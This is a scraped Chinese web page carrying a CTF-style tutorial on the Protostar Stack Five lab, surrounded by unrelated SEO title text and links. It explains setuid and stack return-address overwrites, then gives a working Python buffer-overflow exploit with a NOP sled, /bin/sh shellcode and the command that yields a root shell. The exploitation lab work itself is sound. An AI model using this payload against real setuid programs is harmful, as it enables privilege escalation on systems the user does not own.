当前位置: 首页 > news >正文

有专门做电商网站的CMS吗wordpress 建点

有专门做电商网站的CMS吗,wordpress 建点,手工加工免费供料在家,网站内容的编辑和更新怎么做的前言 这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章 二进制安全虚拟机Protostar靶场 安装,基础知识讲解,破解STACK ZERO https://blog.csdn.net/qq_45894840/artic…

在这里插入图片描述

前言

这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章

二进制安全虚拟机Protostar靶场 安装,基础知识讲解,破解STACK ZERO
https://blog.csdn.net/qq_45894840/article/details/129490504?spm=1001.2014.3001.5501
二进制安全虚拟机Protostar靶场(2)基础知识讲解,栈溢出覆盖变量 Stack One,Stack Two
https://blog.csdn.net/qq_45894840/article/details/132688653?spm=1001.2014.3001.5501
二进制安全虚拟机Protostar靶场(3)溢出控制程序指针,基础知识讲解 Stack Three,Stack Four
https://blog.csdn.net/qq_45894840/article/details/132720953?spm=1001.2014.3001.5501

Stack Five

程序静态分析

https://exploit.education/protostar/stack-five/

在这里插入图片描述

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>int main(int argc, char **argv)
{char buffer[64];gets(buffer);
}

这个程序很简单,只有两行,作用只是接受我们的输入

setuid

什么是setuid?

setuid代表设置用户身份,并且setuid设置调用进程的有效用户ID,用户运行程序的uid与调用进程的真实uid不匹配

这么说起来有点绕,我们来举一个例子

一个要以root权限运行的程序,但我们想让普通用户也能运行它,但又要防止该程序被攻击者利用,这里就需要用的setuid了

演示
我们用user用户运行一个vim
然后新开一个窗口查看后台进程

ps -aux

在这里插入图片描述
这里可以看到,我们的vim正在以user的权限运行中,然后我们去执行一下靶机上的setuid文件看看
在这里插入图片描述
这里可以看到,我们虽然是user用户,但执行文件后,文件正以root权限运行
我们查看文件的权限
在这里插入图片描述
r代表读,w代表写,x代表执行,那s是什么呢

s替换了以x的可执行文件,这被称为setuid位,根据刚刚的操作,应该知道了s是做什么的

当这个位被user权限的用户执行时,linux实际上是以文件的创造者的权限运行的,在这种情况下,它是以root权限运行的
我们的目标就是,破解这些文件然后拿到root权限

什么是栈

可以把栈想象成一个堆积的书本,你可以把新的书本放在最顶部,也可以取出最顶部的书本。

当程序执行时,它会使用栈来跟踪函数调用和变量的值。每次你调用一个函数,计算机会在栈上创建一个新的“帧”(就像书本一样),用来存储这个函数的局部变量和执行时的一些信息。当函数执行完毕时,这个帧会被从栈上移除,就像取出一本书本一样。

栈通常是“后进先出”的,这意味着最后放入栈的数据会最先被取出。这是因为栈的操作是非常快速和高效的,所以它经常用于管理函数调用和跟踪程序执行流程

为什么要覆盖ret返回地址

覆盖 ret 返回地址是一种计算机攻击技巧,攻击者利用它来改变程序执行的路径。这个过程有点像将一个路标或导航指令替换成你自己的指令,以便程序执行到你想要的地方。

想象一下,你在开车时遇到一个交叉路口,路标告诉你向左拐才能到达目的地。但是,攻击者可能会悄悄地改变路标,让你误以为需要向右拐。当你按照这个伪装的路标行驶时,你最终会到达攻击者想要的地方,而不是你本来的目的地。

在计算机中,程序执行的路径通常是通过返回地址控制的,这个返回地址告诉计算机在函数执行完毕后应该继续执行哪里的代码。攻击者可以通过修改这个返回地址,迫使程序跳转到他们指定的地方,通常是一段恶意代码,而不是正常的程序代码

获取ret返回地址

使用gdb打开程序,在执行leave指令的地方下一个断点

在这里插入图片描述

运行程序,随便输入一些字符,然后查看栈状态

x/100wx $esp

在这里插入图片描述

另外开一个远程连接界面,使用gdb打开程序,在执行ret指令的地方下一个断点

在这里插入图片描述

在第二个终端界面运行程序,随便输入一些字符,然后执行ret指令,查看程序跳转的地址

在这里插入图片描述

在这里插入图片描述

根据计算,我们需要80个字符就能完全覆盖ret的返回地址,然后再将我们的shellcode放到控制数据的堆栈里

在这里插入图片描述

nop指令

NOP指令是一种特殊的机器指令,它在计算机中执行时不做任何操作。简单来说,NOP指令是一种“空操作”,它不改变计算机的状态、不影响寄存器的值,也不执行任何计算或跳转

为了防止我们shellcode收到干扰,我们在shellcode代码前添加一些nop指令即可

脚本编写

import structpadding = "A" * 76
eip = struct.pack("I",0xbffff7c0)
nopnop = "\x90"*64
payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x88"print padding+eip+nopnop+payload

首先设置一个76位的垃圾字符,然后利用struct模块的pack功能,作用是将一个无符号整数(I 表示无符号整数)转换为二进制数据,跳转到控制数据的栈里,最后写入nop指令和shellcode代码,shellcode代码可以在这个网站里找到

http://shell-storm.org/shellcode/files/shellcode-811.html

在这里插入图片描述

这是一个linux x86架构执行/bin/sh的shellcode

如果我们直接运行脚本是得不到/bin/sh的

在这里插入图片描述

其实/bin/sh已经执行了,只是没有输入,我们可以用cat命令来重定向到标准输入输出

在这里插入图片描述

 (python stack5exp.py ; cat) | /opt/protostar/bin/stack5

在这里插入图片描述

成功破解程序

http://www.yayakq.cn/news/335950/

相关文章:

  • 乌兰察布做网站物流网络规划名词解释
  • 建设银行甘肃省分行网站做网站推广托管费用
  • 电商网站如何做引流网站建设成功案例书籍
  • 网站数据库备份还原wordpress配置ftp服务器配置
  • 益阳网站建设广告西安网页制作设计
  • 做电影网站采集什么意思用dw制作个人简介网页步骤
  • 网站建设毕业答辩ppt南通专业网站排名推广
  • 北京网站建设公司费用浩森宇特自己做彩票网站简单吗
  • 深圳做网站设计的公司电商平台网站开发
  • 用wordpress搭建完整网站教程视频Python电影网站开发
  • 从哪里可以建公司网站网站建设公司的发展前景
  • 可信网站标识绵阳建设局网站皱劲松
  • wordpress 图片云优化 网站建设
  • wordpress后台上传主题更新失败网站怎么做关键词优化
  • 自己做局域网站东莞网站设计哪家好
  • 购物网站需求分析报告建筑学院网站
  • 公司网站建设开发维护工作高端大气网络设计建设公司网站织梦模板
  • 做电影网站怎么盈利wordpress最新中文版
  • 全景网站怎么做app定制公司哪个好用
  • 做招聘的h5用哪个网站免费wap网站推荐
  • 网站服务器上的跳转选择怎么做热门图片素材
  • 邯郸网站建设方案wordpress怎么发布文章带图片
  • 百度推广网站建设网站后台编辑器上传不了图片
  • 网站优化怎么做网页购买
  • wordpress蜘蛛湖南网站搜索排名优化公司
  • 聚牛网站建设公司ai生成建筑网站
  • 保证量身定制的营销型网站建筑模板的种类
  • 网站修改 iis6应用程序池商业网站是怎么做的
  • 企业网站脚本语言网站超级外链
  • 聊城制作手机网站多媒体网站开发